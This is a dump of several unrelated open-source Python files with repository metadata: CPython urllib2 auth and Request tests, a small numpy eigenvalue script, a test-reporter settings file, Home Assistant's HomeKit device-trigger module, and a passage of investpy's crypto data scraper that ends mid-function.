        auth_handler = urllib_request.ProxyBasicAuthHandler(password_manager)
        realm = "ACME Networks"
        http_handler = MockHTTPHandler(
            407, 'Proxy-Authenticate: Basic realm="%s"\r\n\r\n' % realm)
        opener.add_handler(auth_handler)
        opener.add_handler(http_handler)
        self._test_basic_auth(opener, auth_handler, "Proxy-authorization",
                              realm, http_handler, password_manager,
                              "http://acme.example.com:3128/protected",
                              "proxy.example.com:3128",
                              )

    def test_basic_and_digest_auth_handlers(self):
        # HTTPDigestAuthHandler raised an exception if it couldn't handle a 40*
        # response (http://python.org/sf/1479302), where it should instead
        # return None to allow another handler (especially
        # HTTPBasicAuthHandler) to handle the response.

        # Also (http://python.org/sf/14797027, RFC 2617 section 1.2), we must
        # try digest first (since it's the strongest auth scheme), so we record
        # order of calls here to check digest comes first:
        class RecordingOpenerDirector(OpenerDirector):
            # OpenerDirector that keeps an ordered log of which auth scheme
            # each wrapped handler tried.
            def __init__(self):
                OpenerDirector.__init__(self)
                self.recorded = []
            def record(self, info):
                self.recorded.append(info)

        class TestDigestAuthHandler(urllib_request.HTTPDigestAuthHandler):
            def http_error_401(self, *args, **kwds):
                self.parent.record("digest")
                urllib_request.HTTPDigestAuthHandler.http_error_401(self,
                                                                    *args, **kwds)

        class TestBasicAuthHandler(urllib_request.HTTPBasicAuthHandler):
            def http_error_401(self, *args, **kwds):
                self.parent.record("basic")
                urllib_request.HTTPBasicAuthHandler.http_error_401(self,
                                                                   *args, **kwds)

        opener = RecordingOpenerDirector()
        password_manager = MockPasswordManager()
        digest_handler = TestDigestAuthHandler(password_manager)
        basic_handler = TestBasicAuthHandler(password_manager)
        realm = "ACME Networks"
        http_handler = MockHTTPHandler(
            401, 'WWW-Authenticate: Basic realm="%s"\r\n\r\n' % realm)
        opener.add_handler(basic_handler)
        opener.add_handler(digest_handler)
        opener.add_handler(http_handler)

        # check basic auth isn't blocked by digest handler failing
        self._test_basic_auth(opener, basic_handler, "Authorization",
                              realm, http_handler, password_manager,
                              "http://acme.example.com/protected",
                              "http://acme.example.com/protected",
                              )
        # check digest was tried before basic (twice, because
        # _test_basic_auth called .open() twice)
        self.assertEqual(opener.recorded, ["digest", "basic"]*2)

    def test_unsupported_auth_digest_handler(self):
        # An unrecognized auth scheme (Kerberos) makes the digest handler
        # raise ValueError.
        opener = OpenerDirector()
        # While using DigestAuthHandler
        digest_auth_handler = urllib_request.HTTPDigestAuthHandler(None)
        http_handler = MockHTTPHandler(
            401, 'WWW-Authenticate: Kerberos\r\n\r\n')
        opener.add_handler(digest_auth_handler)
        opener.add_handler(http_handler)
        self.assertRaises(ValueError, opener.open, "http://www.example.com")

    def test_unsupported_auth_basic_handler(self):
        # While using BasicAuthHandler
        opener = OpenerDirector()
        basic_auth_handler = urllib_request.HTTPBasicAuthHandler(None)
        http_handler = MockHTTPHandler(
            401, 'WWW-Authenticate: NTLM\r\n\r\n')
        opener.add_handler(basic_auth_handler)
        opener.add_handler(http_handler)
        self.assertRaises(ValueError, opener.open, "http://www.example.com")

    def _test_basic_auth(self, opener, auth_handler, auth_header,
                         realm, http_handler, password_manager,
                         request_url, protected_url):
        # Shared driver for the basic-auth tests above: registers credentials,
        # opens request_url twice (with and then without credentials), and
        # checks the Authorization/Proxy-authorization header round trip.
        import base64
        user, password = "wile", "coyote"

        # .add_password() fed through to password manager
        auth_handler.add_password(realm, request_url, user, password)
        self.assertEqual(realm, password_manager.realm)
        self.assertEqual(request_url, password_manager.url)
        self.assertEqual(user, password_manager.user)
        self.assertEqual(password, password_manager.password)

        opener.open(request_url)

        # should have asked the password manager for the username/password
        self.assertEqual(password_manager.target_realm, realm)
        self.assertEqual(password_manager.target_url, protected_url)

        # expect one request without authorization, then one with
        self.assertEqual(len(http_handler.requests), 2)
        self.assertFalse(http_handler.requests[0].has_header(auth_header))
        userpass = bytes('%s:%s' % (user, password), "ascii")
        auth_hdr_value = ('Basic ' +
                          base64.encodebytes(userpass).strip().decode())
        self.assertEqual(http_handler.requests[1].get_header(auth_header),
                         auth_hdr_value)
        self.assertEqual(http_handler.requests[1].unredirected_hdrs[auth_header],
                         auth_hdr_value)
        # if the password manager can't find a password, the handler won't
        # handle the HTTP auth error
        password_manager.user = password_manager.password = None
        http_handler.reset()
        opener.open(request_url)
        self.assertEqual(len(http_handler.requests), 1)
        self.assertFalse(http_handler.requests[0].has_header(auth_header))
class MiscTests(unittest.TestCase):
    """Assorted tests: build_opener() composition rules and the HTTPError
    interface (issue 13211)."""

    def opener_has_handler(self, opener, handler_class):
        # Helper: assert the opener holds a handler of exactly this class
        # (subclasses do not count, hence == rather than isinstance).
        self.assertTrue(any(h.__class__ == handler_class
                            for h in opener.handlers))

    def test_build_opener(self):
        class MyHTTPHandler(urllib_request.HTTPHandler): pass
        class FooHandler(urllib_request.BaseHandler):
            def foo_open(self): pass
        class BarHandler(urllib_request.BaseHandler):
            def bar_open(self): pass

        build_opener = urllib_request.build_opener

        o = build_opener(FooHandler, BarHandler)
        self.opener_has_handler(o, FooHandler)
        self.opener_has_handler(o, BarHandler)

        # can take a mix of classes and instances
        o = build_opener(FooHandler, BarHandler())
        self.opener_has_handler(o, FooHandler)
        self.opener_has_handler(o, BarHandler)

        # subclasses of default handlers override default handlers
        o = build_opener(MyHTTPHandler)
        self.opener_has_handler(o, MyHTTPHandler)

        # a particular case of overriding: default handlers can be passed
        # in explicitly
        o = build_opener()
        self.opener_has_handler(o, urllib_request.HTTPHandler)
        o = build_opener(urllib_request.HTTPHandler)
        self.opener_has_handler(o, urllib_request.HTTPHandler)
        o = build_opener(urllib_request.HTTPHandler())
        self.opener_has_handler(o, urllib_request.HTTPHandler)

        # Issue2670: multiple handlers sharing the same base class
        class MyOtherHTTPHandler(urllib_request.HTTPHandler): pass
        o = build_opener(MyHTTPHandler, MyOtherHTTPHandler)
        self.opener_has_handler(o, MyHTTPHandler)
        self.opener_has_handler(o, MyOtherHTTPHandler)

    def test_HTTPError_interface(self):
        """
        Issue 13211 reveals that HTTPError didn't implement the URLError
        interface even though HTTPError is a subclass of URLError.
        """
        msg = 'something bad happened'
        url = code = fp = None
        hdrs = 'Content-Length: 42'
        err = urllib_error.HTTPError(url, code, msg, hdrs, fp)
        self.assertTrue(hasattr(err, 'reason'))
        self.assertEqual(err.reason, 'something bad happened')
        self.assertTrue(hasattr(err, 'hdrs'))
        self.assertEqual(err.hdrs, 'Content-Length: 42')
        expected_errmsg = 'HTTP Error %s: %s' % (err.code, err.msg)
        self.assertEqual(str(err), expected_errmsg)
class RequestTests(unittest.TestCase):
    """Tests for the Request object: method selection, URL parsing
    (selector/host/fragment), proxies, and HTTPError.info()."""

    def setUp(self):
        # One GET request and one POST request (data plus a custom header).
        self.get = Request("http://www.python.org/~jeremy/")
        self.post = Request("http://www.python.org/~jeremy/",
                            "data",
                            headers={"X-Test": "test"})

    def test_method(self):
        self.assertEqual("POST", self.post.get_method())
        self.assertEqual("GET", self.get.get_method())

    def test_data(self):
        # Assigning data to a request switches its method from GET to POST.
        self.assertFalse(self.get.data)
        self.assertEqual("GET", self.get.get_method())
        self.get.data = "spam"
        self.assertTrue(self.get.data)
        self.assertEqual("POST", self.get.get_method())

    def test_get_full_url(self):
        self.assertEqual("http://www.python.org/~jeremy/",
                         self.get.get_full_url())

    def test_selector(self):
        self.assertEqual("/~jeremy/", self.get.selector)
        req = Request("http://www.python.org/")
        self.assertEqual("/", req.selector)

    def test_get_type(self):
        self.assertEqual("http", self.get.type)

    def test_get_host(self):
        self.assertEqual("www.python.org", self.get.host)

    def test_get_host_unquote(self):
        # Percent-escapes in the host component are unquoted.
        req = Request("http://www.%70ython.org/")
        self.assertEqual("www.python.org", req.host)

    def test_proxy(self):
        self.assertFalse(self.get.has_proxy())
        self.get.set_proxy("www.perl.org", "http")
        self.assertTrue(self.get.has_proxy())
        # The original host is preserved as origin_req_host; .host now
        # points at the proxy.
        self.assertEqual("www.python.org", self.get.origin_req_host)
        self.assertEqual("www.perl.org", self.get.host)

    def test_wrapped_url(self):
        # "<URL:...>" wrapping is stripped before parsing.
        req = Request("<URL:http://www.python.org>")
        self.assertEqual("www.python.org", req.host)

    def test_url_fragment(self):
        # Fragments are dropped from the selector used on the wire...
        req = Request("http://www.python.org/?qs=query#fragment=true")
        self.assertEqual("/?qs=query", req.selector)
        req = Request("http://www.python.org/#fun=true")
        self.assertEqual("/", req.selector)

        # Issue 11703: geturl() omits fragment in the original URL.
        url = 'http://docs.python.org/library/urllib2.html#OK'
        req = Request(url)
        self.assertEqual(req.get_full_url(), url)

    def test_HTTPError_interface_call(self):
        """
        Issue 15701 - HTTPError interface has info method available from URLError
        """
        err = urllib_request.HTTPError(msg="something bad happened", url=None,
                                       code=None, hdrs='Content-Length:42', fp=None)
        self.assertTrue(hasattr(err, 'reason'))
        assert hasattr(err, 'reason')
        assert hasattr(err, 'info')
        assert callable(err.info)
        try:
            err.info()
        except AttributeError:
            self.fail('err.info call failed.')
        self.assertEqual(err.info(), "Content-Length:42")
def test_main(verbose=None):
    """Run the full unittest suite for this module.

    The doctest passes are intentionally disabled (kept for reference).
    """
    # support.run_doctest(test_urllib2, verbose)
    # support.run_doctest(urllib_request, verbose)
    tests = (TrivialTests,
             OpenerDirectorTests,
             HandlerTests,
             MiscTests,
             RequestTests,
             RequestHdrsTests)
    support.run_unittest(*tests)
if __name__ == "__main__":
    # Allow running this test module directly from the command line.
    unittest.main()
| [
"ed@pythoncharmers.com"
] | ed@pythoncharmers.com |
c7ddb844b91a3780ee7e60c52dc483fd56926fac | 36957a9ce540846d08f151b6a2c2d582cff1df47 | /VR/Python/Python36/Lib/site-packages/django/contrib/messages/constants.py | fbdce4e4d9bd4e5cf428861ea358ba890c129cfe | [] | no_license | aqp1234/gitVR | 60fc952307ef413e396d31e0d136faffe087ed2b | e70bd82c451943c2966b8ad1bee620a0ee1080d2 | refs/heads/master | 2022-12-29T15:30:12.540947 | 2020-10-07T15:26:32 | 2020-10-07T15:26:32 | 290,163,043 | 0 | 1 | null | 2020-08-25T09:15:40 | 2020-08-25T08:47:36 | C# | UTF-8 | Python | false | false | 128 | py | version https://git-lfs.github.com/spec/v1
oid sha256:599c63cef128288ee6802852169fe0f5efb3507f2be892e1bbdb05b1fb5318d0
size 312
| [
"aqp1234@naver.com"
] | aqp1234@naver.com |
a154800e384742afe40229723c6a82fd41ef1463 | fa0ae8d2e5ecf78df4547f0a106550724f59879a | /Numpy/day06/eig.py | 6c39941771c00a8b74a849b9b48b7c2ab172336f | [] | no_license | Polaris-d/note | 71f8297bc88ceb44025e37eb63c25c5069b7d746 | 6f1a9d71e02fb35d50957f2cf6098f8aca656da9 | refs/heads/master | 2020-03-22T17:51:49.118575 | 2018-09-06T03:36:00 | 2018-09-06T03:36:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 325 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import numpy as np
A = np.mat('3 -2; 1 0')
print(A)
eigvals, eigvecs = np.linalg.eig(A)
print(eigvals, eigvecs, sep='\n')
a = eigvals[0]
x = eigvecs[:, 0]
print(A * x, a * x, sep='\n')
a = eigvals[1]
x = eigvecs[:, 1]
print(A * x, a * x, sep='\n')
| [
"610079251@qq.com"
] | 610079251@qq.com |
56f14e7c79bc56c708ce4d9309d16fc8f969159e | a2e10b9a73ccfb80fbb98d47532d4c6a6de49be7 | /utils/stringIO/grail/settings.py | 942fc950c065c1041feb11cc0ca9f2acb2001c96 | [] | no_license | yuqi-test/ECProAutomation | 81a04b77c9226acd4f745bf59df3c741bd9d3605 | 9c08c5b3bd122809fbb5b44cd933f4240e42e4f7 | refs/heads/master | 2022-04-21T11:46:17.788667 | 2020-04-21T10:12:52 | 2020-04-21T10:12:52 | 257,553,619 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 398 | py | export_mode = False
# Default configuration flags for the package (consumed elsewhere; the
# descriptions below are best-effort from names/values -- confirm against
# the consuming modules).
disable_steps = False  # presumably disables step reporting entirely -- TODO confirm
print_step_time = False  # when True, a step's duration is printed via step_time_template
step_time_template = '[{0:4.2f}s] '  # str.format template; {0} presumably the duration in seconds
indentation_const = ' '  # unit of indentation for nested output
# Fixture hook names (pytest/nose setup/teardown conventions) that are
# treated specially rather than reported as ordinary functions.
skip_func = ('setup',
             'teardown',
             'setup_class',
             'teardown_class',
             'setup_module',
             'teardown_module',
             'setup_package',
             'teardown_package',
             'tearDown',
             )
| [
"yuqi@infimind.com"
] | yuqi@infimind.com |
361d302383edd8c481ca9343608831aae35d9763 | 5963c12367490ffc01c9905c028d1d5480078dec | /homeassistant/components/homekit_controller/device_trigger.py | 818b75e47d3c3528f911983eb9db25fa0fe05125 | [
"Apache-2.0"
] | permissive | BenWoodford/home-assistant | eb03f73165d11935e8d6a9756272014267d7d66a | 2fee32fce03bc49e86cf2e7b741a15621a97cce5 | refs/heads/dev | 2023-03-05T06:13:30.354545 | 2021-07-18T09:51:53 | 2021-07-18T09:51:53 | 117,122,037 | 11 | 6 | Apache-2.0 | 2023-02-22T06:16:51 | 2018-01-11T16:10:19 | Python | UTF-8 | Python | false | false | 8,675 | py | """Provides device automations for homekit devices."""
from __future__ import annotations
from aiohomekit.model.characteristics import CharacteristicsTypes
from aiohomekit.model.characteristics.const import InputEventValues
from aiohomekit.model.services import ServicesTypes
from aiohomekit.utils import clamp_enum_to_char
import voluptuous as vol
from homeassistant.components.automation import AutomationActionType
from homeassistant.components.device_automation import DEVICE_TRIGGER_BASE_SCHEMA
from homeassistant.const import CONF_DEVICE_ID, CONF_DOMAIN, CONF_PLATFORM, CONF_TYPE
from homeassistant.core import CALLBACK_TYPE, HomeAssistant, callback
from homeassistant.helpers.typing import ConfigType
from .const import DOMAIN, KNOWN_DEVICES, TRIGGERS
# Trigger "type" values exposed to automations: one doorbell event plus up
# to ten numbered buttons (multi-button remotes enumerate one type per
# physical button, see enumerate_stateless_switch_group).
TRIGGER_TYPES = {
    "doorbell",
    "button1",
    "button2",
    "button3",
    "button4",
    "button5",
    "button6",
    "button7",
    "button8",
    "button9",
    "button10",
}
# Press styles HomeKit can report for a stateless switch.
TRIGGER_SUBTYPES = {"single_press", "double_press", "long_press"}

CONF_IID = "iid"
CONF_SUBTYPE = "subtype"

# Validation schema for a device-trigger automation config of this domain.
TRIGGER_SCHEMA = DEVICE_TRIGGER_BASE_SCHEMA.extend(
    {
        vol.Required(CONF_TYPE): vol.In(TRIGGER_TYPES),
        vol.Required(CONF_SUBTYPE): vol.In(TRIGGER_SUBTYPES),
    }
)

# Map aiohomekit's InputEventValues onto the subtype strings above.
HK_TO_HA_INPUT_EVENT_VALUES = {
    InputEventValues.SINGLE_PRESS: "single_press",
    InputEventValues.DOUBLE_PRESS: "double_press",
    InputEventValues.LONG_PRESS: "long_press",
}
class TriggerSource:
    """Represents a stateless source of event data from HomeKit.

    Stateless accessory events (button presses, doorbell rings) have no
    entity state, so this class bridges them to device-automation triggers.
    """

    def __init__(self, connection, aid, triggers):
        """Initialize a set of triggers for a device.

        ``connection`` is the pairing connection owning the accessory,
        ``aid`` the accessory id within it, and ``triggers`` the trigger
        descriptions produced by the enumerate_* helpers in this module.
        """
        self._hass = connection.hass
        self._connection = connection
        self._aid = aid
        # Index trigger descriptions by (type, subtype) so that
        # async_attach_trigger can look them up from an automation config.
        self._triggers = {}
        for trigger in triggers:
            self._triggers[(trigger["type"], trigger["subtype"])] = trigger
        # iid -> list of handlers registered by attached automations.
        self._callbacks = {}

    def fire(self, iid, value):
        """Process events that have been received from a HomeKit accessory."""
        # Fan the characteristic update out to every handler for that iid.
        for event_handler in self._callbacks.get(iid, []):
            event_handler(value)

    def async_get_triggers(self):
        """List device triggers for homekit devices."""
        # Yields the (type, subtype) tuples built in __init__.
        yield from self._triggers

    async def async_attach_trigger(
        self,
        config: TRIGGER_SCHEMA,
        action: AutomationActionType,
        automation_info: dict,
    ) -> CALLBACK_TYPE:
        """Attach a trigger.

        Returns a callback that detaches the trigger again.
        """
        trigger_data = (
            automation_info.get("trigger_data", {}) if automation_info else {}
        )

        def event_handler(char):
            # Only fire the automation for the press style it subscribed to.
            if config[CONF_SUBTYPE] != HK_TO_HA_INPUT_EVENT_VALUES[char["value"]]:
                return
            self._hass.async_create_task(
                action({"trigger": {**trigger_data, **config}})
            )

        trigger = self._triggers[config[CONF_TYPE], config[CONF_SUBTYPE]]
        iid = trigger["characteristic"]

        # Ensure the connection watches this characteristic so accessory
        # events actually reach fire().
        self._connection.add_watchable_characteristics([(self._aid, iid)])
        self._callbacks.setdefault(iid, []).append(event_handler)

        def async_remove_handler():
            # Unregister the handler; invoked when the automation unloads.
            if iid in self._callbacks:
                self._callbacks[iid].remove(event_handler)

        return async_remove_handler
def enumerate_stateless_switch(service):
    """Enumerate a stateless switch, like a single button."""
    # A stateless switch carrying a SERVICE_LABEL_INDEX belongs to a button
    # group, which enumerate_stateless_switch_group handles instead.
    part_of_group = (
        service.has(CharacteristicsTypes.SERVICE_LABEL_INDEX)
        and len(service.linked) > 0
    )
    if part_of_group:
        return []

    input_event = service[CharacteristicsTypes.INPUT_EVENT]

    # HomeKit defines single, double and long presses, but a vendor may
    # support fewer - clamp to what the characteristic reports.
    supported_presses = clamp_enum_to_char(InputEventValues, input_event)

    triggers = []
    for press in supported_presses:
        triggers.append(
            {
                "characteristic": input_event.iid,
                "value": press,
                "type": "button1",
                "subtype": HK_TO_HA_INPUT_EVENT_VALUES[press],
            }
        )
    return triggers
def enumerate_stateless_switch_group(service):
    """Enumerate a group of stateless switches, like a remote control."""
    # Collect the sibling switches linked to this service label, ordered by
    # SERVICE_LABEL_INDEX so button numbering is stable.
    switches = list(
        service.accessory.services.filter(
            service_type=ServicesTypes.STATELESS_PROGRAMMABLE_SWITCH,
            child_service=service,
            order_by=[CharacteristicsTypes.SERVICE_LABEL_INDEX],
        )
    )

    # One trigger per (button, press style). HomeKit defines single, double
    # and long presses, but a vendor may support fewer - clamp per button.
    return [
        {
            "characteristic": switch[CharacteristicsTypes.INPUT_EVENT].iid,
            "value": press,
            "type": f"button{position + 1}",
            "subtype": HK_TO_HA_INPUT_EVENT_VALUES[press],
        }
        for position, switch in enumerate(switches)
        for press in clamp_enum_to_char(
            InputEventValues, switch[CharacteristicsTypes.INPUT_EVENT]
        )
    ]
def enumerate_doorbell(service):
    """Enumerate doorbell buttons."""
    input_event = service[CharacteristicsTypes.INPUT_EVENT]

    # HomeKit defines single, double and long presses, but a vendor may
    # support fewer - clamp to what the characteristic reports.
    return [
        {
            "characteristic": input_event.iid,
            "value": press,
            "type": "doorbell",
            "subtype": HK_TO_HA_INPUT_EVENT_VALUES[press],
        }
        for press in clamp_enum_to_char(InputEventValues, input_event)
    ]
# Dispatch table: HomeKit service type -> enumerator that yields the
# trigger descriptions for that service.
TRIGGER_FINDERS = {
    ServicesTypes.SERVICE_LABEL: enumerate_stateless_switch_group,
    ServicesTypes.STATELESS_PROGRAMMABLE_SWITCH: enumerate_stateless_switch,
    ServicesTypes.DOORBELL: enumerate_doorbell,
}
async def async_setup_triggers_for_entry(hass: HomeAssistant, config_entry):
    """Triggers aren't entities as they have no state, but we still need to set them up for a config entry."""
    hkid = config_entry.data["AccessoryPairingID"]
    conn = hass.data[KNOWN_DEVICES][hkid]

    @callback
    def async_add_service(service):
        # Returns True when this service was claimed and a TriggerSource
        # registered for its device.
        aid = service.accessory.aid
        service_type = service.short_type

        # If not a known service type then we can't handle any stateless events for it
        if service_type not in TRIGGER_FINDERS:
            return False

        # We can't have multiple trigger sources for the same device id
        # Can't have a doorbell and a remote control in the same accessory
        # They have to be different accessories (they can be on the same bridge)
        # In practice, this is inline with what iOS actually supports AFAWCT.
        device_id = conn.devices[aid]
        if device_id in hass.data[TRIGGERS]:
            return False

        # Just because we recognise the service type doesn't mean we can actually
        # extract any triggers - so only proceed if we can
        triggers = TRIGGER_FINDERS[service_type](service)
        if len(triggers) == 0:
            return False

        trigger = TriggerSource(conn, aid, triggers)
        hass.data[TRIGGERS][device_id] = trigger

        return True

    conn.add_listener(async_add_service)
def async_fire_triggers(conn, events):
    """Process events generated by a HomeKit accessory into automation triggers."""
    for (aid, iid), ev in events.items():
        # Skip events for accessories we have no device mapping for.
        if aid not in conn.devices:
            continue
        device_id = conn.devices[aid]
        trigger_source = conn.hass.data[TRIGGERS].get(device_id)
        if trigger_source is not None:
            trigger_source.fire(iid, ev)
async def async_get_triggers(hass: HomeAssistant, device_id: str) -> list[dict]:
    """List device triggers for homekit devices."""
    # No TriggerSource registered for this device means no triggers.
    if device_id not in hass.data.get(TRIGGERS, {}):
        return []

    trigger_source = hass.data[TRIGGERS][device_id]

    triggers = []
    for trigger_type, trigger_subtype in trigger_source.async_get_triggers():
        triggers.append(
            {
                CONF_PLATFORM: "device",
                CONF_DEVICE_ID: device_id,
                CONF_DOMAIN: DOMAIN,
                CONF_TYPE: trigger_type,
                CONF_SUBTYPE: trigger_subtype,
            }
        )
    return triggers
async def async_attach_trigger(
    hass: HomeAssistant,
    config: ConfigType,
    action: AutomationActionType,
    automation_info: dict,
) -> CALLBACK_TYPE:
    """Attach a trigger."""
    # Delegate to the TriggerSource registered for the targeted device.
    trigger_source = hass.data[TRIGGERS][config[CONF_DEVICE_ID]]
    return await trigger_source.async_attach_trigger(config, action, automation_info)
| [
"noreply@github.com"
] | BenWoodford.noreply@github.com |
b96ba129827be46b1f0c7523731af7bda10b1f1b | 046674b67ad5727ec65725e826ea354ca07d71da | /investpy/crypto.py | 3878b3eb3b153a3a2edf0faa71ea87aa619e46d6 | [
"MIT"
] | permissive | alexanu/investpy | cad2d0ef3f67b4fa4ecb23a4730ae96c1a162168 | bc46d30af21f03ab5b7b9aa259b755db281277bb | refs/heads/master | 2020-12-28T08:48:01.479075 | 2020-05-15T22:42:15 | 2020-05-15T22:42:15 | 238,252,327 | 0 | 1 | MIT | 2020-05-15T22:42:16 | 2020-02-04T16:31:29 | null | UTF-8 | Python | false | false | 40,053 | py | #!/usr/bin/python3
# Copyright 2018-2020 Alvaro Bartolome @ alvarob96 in GitHub
# See LICENSE for details.
from datetime import datetime, date, timedelta
import json
from random import randint

import pandas as pd
import pkg_resources
import requests
import unidecode
from lxml.html import fromstring

from investpy.utils.user_agent import get_random
from investpy.utils.data import Data

from investpy.data.crypto_data import cryptos_as_df, cryptos_as_list, cryptos_as_dict
def get_cryptos():
    """Return the static crypto-coin reference data bundled with investpy.

    The data originates from Investing.com and is cached in ``cryptos.csv``;
    only the main coins tracked by Investing.com are included.

    Returns:
        :obj:`pandas.DataFrame` - cryptos_df:
            One row per available crypto coin, shaped like::

                name | symbol | currency
                -----|--------|----------
                xxxx | xxxxxx | xxxxxxxx

    Raises:
        FileNotFoundError: raised if `cryptos.csv` file was not found.
        IOError: raised when `cryptos.csv` file is missing or empty.
    """
    return cryptos_as_df()
def get_cryptos_list():
    """Return the names of every crypto coin bundled with investpy.

    The names come from ``cryptos.csv`` (data previously scraped from
    Investing.com) and are the main input for the crypto retrieval
    functions of investpy. Only the main coins tracked by Investing.com
    are included.

    Returns:
        :obj:`list` - cryptos_list:
            All available crypto coin names, e.g.::

                cryptos_list = ['Bitcoin', 'Ethereum', 'XRP', 'Bitcoin Cash', 'Tether', 'Litecoin', ...]

    Raises:
        FileNotFoundError: raised if `cryptos.csv` file was not found.
        IOError: raised when `cryptos.csv` file is missing or empty.
    """
    return cryptos_as_list()
def get_cryptos_dict(columns=None, as_json=False):
    """Return the bundled crypto reference data as dicts (or JSON).

    Every row of ``cryptos.csv`` becomes a :obj:`dict` with the keys
    ``name``, ``currency`` and ``symbol``; pass ``columns`` to keep only a
    subset of those fields, and ``as_json=True`` to get the result as a
    JSON-encoded string instead. Only the main coins tracked by
    Investing.com are included.

    Args:
        columns (:obj:`list`, optional): column names of the crypto data to retrieve, can be: <name, currency, symbol>
        as_json (:obj:`bool`, optional): if True the returned data will be a :obj:`json` object, if False, a :obj:`list` of :obj:`dict`.

    Returns:
        :obj:`list` of :obj:`dict` OR :obj:`json` - cryptos_dict:
            Rows shaped like::

                cryptos_dict = {
                    'name': name,
                    'currency': currency,
                    'symbol': symbol,
                }

    Raises:
        ValueError: raised whenever any of the introduced arguments is not valid.
        FileNotFoundError: raised if `cryptos.csv` file was not found.
        IOError: raised when `cryptos.csv` file is missing or empty.
    """
    return cryptos_as_dict(columns=columns, as_json=as_json)
def get_crypto_recent_data(crypto, as_json=False, order='ascending', interval='Daily'):
    """
    This function retrieves recent historical data from the introduced crypto from Investing.com. So on, the recent data
    of the introduced crypto will be retrieved and returned as a :obj:`pandas.DataFrame` if the parameters are valid
    and the request to Investing.com succeeds. Note that additionally some optional parameters can be specified: as_json
    and order, which let the user decide if the data is going to be returned as a :obj:`json` or not, and if the historical
    data is going to be ordered ascending or descending (where the index is the date), respectively.

    Args:
        crypto (:obj:`str`): name of the crypto currency to retrieve data from.
        as_json (:obj:`bool`, optional):
            to determine the format of the output data, either a :obj:`pandas.DataFrame` if False and a :obj:`json` if True.
        order (:obj:`str`, optional): to define the order of the retrieved data which can either be ascending or descending.
        interval (:obj:`str`, optional):
            value to define the historical data interval to retrieve, by default `Daily`, but it can also be `Weekly` or `Monthly`.

    Returns:
        :obj:`pandas.DataFrame` or :obj:`json`:
            The function can return either a :obj:`pandas.DataFrame` or a :obj:`json` object, containing the retrieved
            recent data of the specified crypto currency. So on, the resulting dataframe contains the open, high, low,
            close and volume values for the selected crypto on market days and the currency in which those values are presented.

            The resulting recent data, in case that the default parameters were applied, will look like::

                Date || Open | High | Low | Close | Volume | Currency
                -----||------|------|-----|-------|--------|----------
                xxxx || xxxx | xxxx | xxx | xxxxx | xxxxxx | xxxxxxxx

            but in case that as_json parameter was defined as True, then the output will be::

                {
                    name: name,
                    recent: [
                        {
                            date: 'dd/mm/yyyy',
                            open: x,
                            high: x,
                            low: x,
                            close: x,
                            volume: x,
                            currency: x
                        },
                        ...
                    ]
                }

    Raises:
        ValueError: raised whenever any of the introduced arguments is not valid or errored.
        IOError: raised if cryptos object/file was not found or unable to retrieve.
        RuntimeError: raised if the introduced crypto name was not found or did not match any of the existing ones.
        ConnectionError: raised if connection to Investing.com could not be established.
        IndexError: raised if crypto recent data was unavailable or not found in Investing.com.

    Examples:
        >>> investpy.get_crypto_recent_data(crypto='bitcoin')
                      Open     High     Low    Close   Volume Currency
        Date
        2019-10-25  7422.8   8697.7  7404.9   8658.3  1177632      USD
        2019-10-26  8658.4  10540.0  8061.8   9230.6  1784005      USD

    """

    # --- argument validation -------------------------------------------------
    if not crypto:
        raise ValueError("ERR#0083: crypto parameter is mandatory and must be a valid crypto name.")

    if not isinstance(crypto, str):
        raise ValueError("ERR#0084: crypto argument needs to be a str.")

    if not isinstance(as_json, bool):
        raise ValueError("ERR#0002: as_json argument can just be True or False, bool type.")

    if order not in ['ascending', 'asc', 'descending', 'desc']:
        raise ValueError("ERR#0003: order argument can just be ascending (asc) or descending (desc), str type.")

    if not interval:
        raise ValueError("ERR#0073: interval value should be a str type and it can just be either 'Daily', 'Weekly' or 'Monthly'.")

    if not isinstance(interval, str):
        raise ValueError("ERR#0073: interval value should be a str type and it can just be either 'Daily', 'Weekly' or 'Monthly'.")

    if interval not in ['Daily', 'Weekly', 'Monthly']:
        raise ValueError("ERR#0073: interval value should be a str type and it can just be either 'Daily', 'Weekly' or 'Monthly'.")

    # --- load the bundled crypto reference data (name/id/currency/status) ---
    resource_package = 'investpy'
    resource_path = '/'.join(('resources', 'crypto', 'cryptos.csv'))
    if pkg_resources.resource_exists(resource_package, resource_path):
        cryptos = pd.read_csv(pkg_resources.resource_filename(resource_package, resource_path))
    else:
        raise FileNotFoundError("ERR#0081: cryptos file not found or errored.")

    if cryptos is None:
        raise IOError("ERR#0082: cryptos not found or unable to retrieve.")

    # Normalise the user-supplied name (whitespace/case/accents) for matching.
    crypto = crypto.strip()
    crypto = crypto.lower()

    if unidecode.unidecode(crypto) not in [unidecode.unidecode(value.lower()) for value in cryptos['name'].tolist()]:
        raise RuntimeError("ERR#0085: crypto currency: " + crypto + ", not found, check if it is correct.")

    status = cryptos.loc[(cryptos['name'].str.lower() == crypto).idxmax(), 'status']
    if status == 'unavailable':
        raise ValueError("ERR#0086: the selected crypto currency is not available for retrieval in Investing.com.")

    crypto_name = cryptos.loc[(cryptos['name'].str.lower() == crypto).idxmax(), 'name']
    crypto_id = cryptos.loc[(cryptos['name'].str.lower() == crypto).idxmax(), 'id']
    crypto_currency = cryptos.loc[(cryptos['name'].str.lower() == crypto).idxmax(), 'currency']

    header = crypto_name + ' Historical Data'

    # Form payload expected by Investing.com's HistoricalDataAjax endpoint.
    params = {
        "curr_id": crypto_id,
        "smlID": str(randint(1000000, 99999999)),
        "header": header,
        "interval_sec": interval,
        "sort_col": "date",
        "sort_ord": "DESC",
        "action": "historical_data"
    }

    head = {
        "User-Agent": get_random(),  # rotating UA string to reduce scraper blocking
        "X-Requested-With": "XMLHttpRequest",
        "Accept": "text/html",
        "Accept-Encoding": "gzip, deflate, br",
        "Connection": "keep-alive",
    }

    url = "https://www.investing.com/instruments/HistoricalDataAjax"

    req = requests.post(url, headers=head, data=params)

    if req.status_code != 200:
        raise ConnectionError("ERR#0015: error " + str(req.status_code) + ", try again later.")

    root_ = fromstring(req.text)
    path_ = root_.xpath(".//table[@id='curr_table']/tbody/tr")
    result = list()

    if path_:
        for elements_ in path_:
            if elements_.xpath(".//td")[0].text_content() == 'No results found':
                raise IndexError("ERR#0087: crypto information unavailable or not found.")

            # Each cell exposes its raw value in the data-real-value
            # attribute; column order is [timestamp, close, open, high,
            # low, volume].
            info = []

            for nested_ in elements_.xpath(".//td"):
                info.append(nested_.get('data-real-value'))

